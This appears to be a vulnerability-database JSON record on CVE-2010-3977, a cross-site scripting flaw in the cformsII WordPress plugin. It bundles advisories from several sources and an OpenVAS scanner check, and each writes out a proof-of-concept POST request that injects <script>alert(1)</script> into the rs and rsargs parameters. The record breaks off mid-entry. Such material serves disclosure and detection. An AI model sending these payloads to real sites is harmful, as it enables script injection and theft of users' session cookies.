&lt;server&gt;\r\n\r\nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:\r\n\r\n1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\n\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\r\nAccept-Language: en-us,en;q=0.5\r\n\r\nAccept-Encoding: gzip,deflate\r\n\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n\r\nKeep-Alive: 115\r\n\r\nConnection: keep-alive\r\n\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\nContent-Length: 219\r\n\r\nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do\r\n\r\n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce\r\n\r\n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do\r\n\r\n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;\r\n\r\nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;\r\n\r\ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam\r\n\r\n%40checkpoint.com\r\n\r\nPragma: no-cache\r\n\r\nCache-Control: no-cache\r\n\r\nrs=&lt;script&gt;alert(1)&lt;/script&gt;&amp;rst=&amp;rsrnd=1287506634854&amp;rsargs[]=1$#\r\n\r\n$&lt;script&gt;alert(1)&lt;/script&gt;$#$rbranco_nospam@checkpoint.com$#$http://\r\n\r\nwww.checkpoint.com$#$&lt;script&gt;alert(1)&lt;/script&gt;\r\n\n ", "status": "poc,details", "history": [], "description": "BUGTRAQ ID: 44587\r\nCVE ID: CVE-2010-3977\r\n\r\nWordPress\u662f\u4e00\u6b3e\u514d\u8d39\u7684\u8bba\u575bBlog\u7cfb\u7edf\u3002\r\n\r\nWordPress\u6240\u4f7f\u7528\u7684cformsII\u63d2\u4ef6\u6ca1\u6709\u6b63\u786e\u7684\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7ed9wp-content/plugins/cforms /lib_ajax.php\u9875\u9762\u7684rs\u548crsargs\u53c2\u6570\u4fbf\u663e\u793a\u7ed9\u4e86\u7528\u6237\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u7684POST\u8bf7\u6c42\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5f53\u7528\u6237\u67e5\u770b\u751f\u6210\u9875\u9762\u65f6\u5c31\u4f1a\u5bfc\u81f4\u6267\u884c\u6240\u6ce8\u5165\u7684\u4ee3\u7801\u3002\n\nNicole Stich cformsII 11.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nNicole Stich\r\n------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.deliciousdays.com/cforms-plugin/", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20225", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-20225", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 5, "references": [], "lastseen": "2017-11-19T18:07:33", "published": "2010-11-03T00:00:00", "objectVersion": "1.4", "cvelist": ["CVE-2010-3977"], "id": "SSV:20225", "enchantments_done": [], "modified": "2010-11-03T00:00:00", "title": "WordPress cformsII\u63d2\u4ef6rs\u548crsargs\u53c2\u6570\u811a\u672c\u6ce8\u5165\u6f0f\u6d1e", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-11-19T18:07:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "WPVDB-ID:8782"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}], "modified": "2017-11-19T18:07:33", "rev": 2}}, "_object_type": "robots.models.seebug.SeebugBulletin"}], "exploitdb": [{"id": "EDB-ID:34946", "hash": "b4ec16cfb8cbeaead69f135d1c9b6b0b003160c39c0a0634dfe3a1d9bc7f447e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities", "description": "cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities. CVE-2010-3977. Webapps exploit for php platform", "published": "2010-11-01T00:00:00", "modified": "2010-11-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/34946/", "reporter": "Wagner Elias", "references": [], "cvelist": ["CVE-2010-3977"], "lastseen": "2016-02-04T00:16:41", "history": [{"lastseen": "2016-02-04T00:16:41", "different_elements": ["cvss2"], "edition": 1, "bulletin": {"lastseen": "2016-02-04T00:16:41", "references": [], "description": "cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities. CVE-2010-3977. Webapps exploit for php platform", "edition": 1, "cvss3": {}, "reporter": "Wagner Elias", "history": [], "published": "2010-11-01T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2016-02-04T00:16:41", "vector": "NONE", "value": 5.3}, "dependencies": {"rev": 2, "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["WPVDB-ID:8782", "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "modified": "2016-02-04T00:16:41"}}, "title": "cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3977"], "immutableFields": [], "modified": "2010-11-01T00:00:00", "href": "https://www.exploit-db.com/exploits/34946/", "id": "EDB-ID:34946", "viewCount": 8, "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "hashmap": [{"hash": "ce52ecefa79dfc45f4febe8f9665ed27", "key": "modified"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c6489426da8ebbc713ddf5a4cbbfd222", "key": "title"}, {"hash": "ea4f75a0ee8cfa250c1b552326d62d83", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "58c087fe5105174833506e59686f0761", "key": "href"}, {"hash": "ce52ecefa79dfc45f4febe8f9665ed27", "key": "published"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "f6a1b70decb808246ef6ea41cae6d478", "key": "reporter"}], "hash": "503d1be29f0d46565f3badc7ecf159c3fe02aecd8dbedcebb9acdd08566ac61b"}}], "viewCount": 8, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2016-02-04T00:16:41", "rev": 2}, "dependencies": {"references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["WPVDB-ID:8782", "WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "modified": "2016-02-04T00:16:41", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/34946/", "sourceData": "source: http://www.securityfocus.com/bid/44587/info\r\n\r\nThe cformsII plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.\r\n\r\ncformsII 13.1 is vulnerable; other versions may also be affected. \r\n\r\n Request:\r\n\r\n http://www.example.com/wp-content/plugins/cforms/lib_ajax.php\r\n\r\n POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\r\n\r\n Host: www.example.com\r\n\r\n User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:\r\n\r\n 1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\n\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\r\n Accept-Language: en-us,en;q=0.5\r\n\r\n Accept-Encoding: gzip,deflate\r\n\r\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n\r\n Keep-Alive: 115\r\n\r\n Connection: keep-alive\r\n\r\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\n Content-Length: 219\r\n\r\n Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do\r\n\r\n %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce\r\n\r\n %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do\r\n\r\n %26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;\r\n\r\n c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;\r\n\r\n comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam\r\n\r\n %40checkpoint.com\r\n\r\n Pragma: no-cache\r\n\r\n Cache-Control: no-cache\r\n\r\n rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\r\n\r\n $<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://\r\n\r\n www.checkpoint.com$#$<script>alert(1)</script>\r\n", "osvdbidlist": ["69339"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "24b9de688e7c9a27ad8f08d023cd5726"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "ea4f75a0ee8cfa250c1b552326d62d83"}, {"key": "href", "hash": "58c087fe5105174833506e59686f0761"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "ce52ecefa79dfc45f4febe8f9665ed27"}, {"key": "published", "hash": "ce52ecefa79dfc45f4febe8f9665ed27"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f6a1b70decb808246ef6ea41cae6d478"}, {"key": "title", "hash": "c6489426da8ebbc713ddf5a4cbbfd222"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "packetstorm": [{"id": "PACKETSTORM:95395", "hash": "a80b04a541cab9bf2c56ddb3e2fa9e8c", "type": "packetstorm", "bulletinFamily": "exploit", "title": "cforms WordPress Plugin Cross Site Scripting", "description": "", "published": "2010-11-02T00:00:00", "modified": "2010-11-02T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "href": "https://packetstormsecurity.com/files/95395/cforms-WordPress-Plugin-Cross-Site-Scripting.html", "reporter": "Rodrigo Rubira Branco", "references": [], "cvelist": ["CVE-2010-3977"], "lastseen": "2016-12-05T22:13:10", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2016-12-05T22:13:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B", "WPVDB-ID:8782"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}], "modified": "2016-12-05T22:13:10", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://packetstormsecurity.com/files/download/95395/cforms-xss.txt", "sourceData": "`Check Point Software Technologies - Vulnerability Discovery Team (VDT) \nhttp://www.checkpoint.com/defense/ \n \ncforms WordPress Plugin Cross Site Scripting Vulnerability \nCVE-2010-3977 \n \n \nINTRODUCTION \n \nAccording to Delicious Days, \"cforms is a powerful and feature rich form plugin for WordPress, offering convenient deployment of multiple Ajax \ndriven contact forms throughout your blog or even on the same page.\" \n \nThis problem was confirmed in the following versions of the cforms WordPress Plugin, other versions \nmaybe also affected. \n \ncforms v11.5 \n \n \nCVSS Scoring System \n \nThe CVSS score is: 5.5 \nBase Score: 6.7 \nTemporal Score: 5.5 \nWe used the following values to calculate the scores: \nBase score is: AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal score is: E:F/RL:OF/RC:C \n \n \nDETAILS \n \nA data array is created in lib_ajax.php using values from a form field in a POST request. The parameters rs and rsargs are not validated and thus \nit is possible to inject code. \n \nRequest: \nhttp://<server>/wp-content/plugins/cforms/lib_ajax.php \nPOST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1 \nHost: <server> \nUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv: \n1.9.2.10) Gecko/20100914 Firefox/3.6.10 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Encoding: gzip,deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nKeep-Alive: 115 \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 219 \nCookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do \n%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce \n%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do \n%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765; \nc o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ; \ncomment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam \n%40checkpoint.com \nPragma: no-cache \nCache-Control: no-cache \nrs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$# \n$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http:// \nwww.checkpoint.com$#$<script>alert(1)</script> \n \n \n \nCREDITS \n \nThis vulnerability has been brought to our attention by Wagner Elias from Conviso IT Security company (http://www.conviso.com.br) and researched internally by Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT). \n \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310801628", "hash": "bb7674c7f0fcb7953d210ca5864ec672", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2019-11-12T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://www.deliciousdays.com/cforms-plugin/", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2019-11-14T16:30:14", "history": [{"bulletin": {"id": "OPENVAS:1361412562310801628", "hash": "b630583a31d28e665ccc44777d99afb6cb757abb061ff84d1b5345eb53e47957", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2017-02-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2018-09-02T00:05:11", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2018-09-02T00:05:11", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_html_injection_vuln.nasl 5388 2017-02-21 15:13:30Z teissa $\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"$Revision: 5388 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-21 16:13:30 +0100 (Tue, 21 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42006\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name : \"URL\" , value : \"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\n\n Impact Level: Application\");\n script_tag(name : \"affected\" , value : \"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name : \"insight\" , value : \"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name : \"solution\" , value : \"Upgrade to cforms Version 11.6.1 or later.\n For updates refer to http://www.deliciousdays.com/cforms-plugin/\");\n script_tag(name : \"summary\" , value : \"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\n## Construct POST attack request\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: \",hostname,\"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\\r\\n\",\n \"Content-Length: 92\\r\\n\\r\\n\",\n \"rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#\",\n \"$<script>alert(1)</script>\\r\\n\");\nres = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm exploit worked by checking the response\nif(('<script>alert(1)</script>' >< res) &&\n egrep(pattern:\"^HTTP/.* 200 OK\", string:res))\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses"}, "differentElements": ["references", "modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:05:11"}, {"bulletin": {"id": "OPENVAS:1361412562310801628", "hash": "b630583a31d28e665ccc44777d99afb6cb757abb061ff84d1b5345eb53e47957", "type": "openvas", "bulletinFamily": "scanner", "title": "WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities", "description": "This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.", "published": "2010-11-16T00:00:00", "modified": "2017-02-21T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801628", "reporter": "Copyright (C) 2010 Greenbone Networks GmbH", "references": ["http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/", "http://xforce.iss.net/xforce/xfdb/62938", "http://secunia.com/advisories/42006"], "cvelist": ["CVE-2010-3977"], "lastseen": "2017-07-02T21:09:51", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310801628", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_html_injection_vuln.nasl 5388 2017-02-21 15:13:30Z teissa $\n#\n# WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#############################################################################\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801628\");\n script_version(\"$Revision: 5388 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-21 16:13:30 +0100 (Tue, 21 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 10:37:01 +0100 (Tue, 16 Nov 2010)\");\n script_bugtraq_id(44587);\n script_cve_id(\"CVE-2010-3977\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"WordPress Plugin cformsII 'lib_ajax.php' Multiple HTML Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/42006\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/62938\");\n script_xref(name : \"URL\" , value : \"http://www.conviso.com.br/security-advisory-cform-wordpress-plugin-v-11-cve-2010-3977/\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow attacker to execute arbitrary\n code in the context of the application.\n\n Impact Level: Application\");\n script_tag(name : \"affected\" , value : \"WordPress plugin cforms Version 11.5 and earlier.\");\n script_tag(name : \"insight\" , value : \"The flaws are caused by improper validation of user-supplied\n input passed via the 'rs' and 'rsargs' parameters to\n wp-content/plugins/cforms/lib_ajax.php, which allows attackers to execute\n arbitrary HTML and script code on the web server.\");\n script_tag(name : \"solution\" , value : \"Upgrade to cforms Version 11.6.1 or later.\n For updates refer to http://www.deliciousdays.com/cforms-plugin/\");\n script_tag(name : \"summary\" , value : \"This host is running cformsII WordPress Plugin and is prone to\n multiple HTML injection vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port)) exit(0);\n\nif (dir == \"/\") dir = \"\";\nhostname = http_host_name(port:port);\n\n## Construct POST attack request\nreq = string(\"POST \",dir,\"/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1\\r\\n\",\n \"Host: 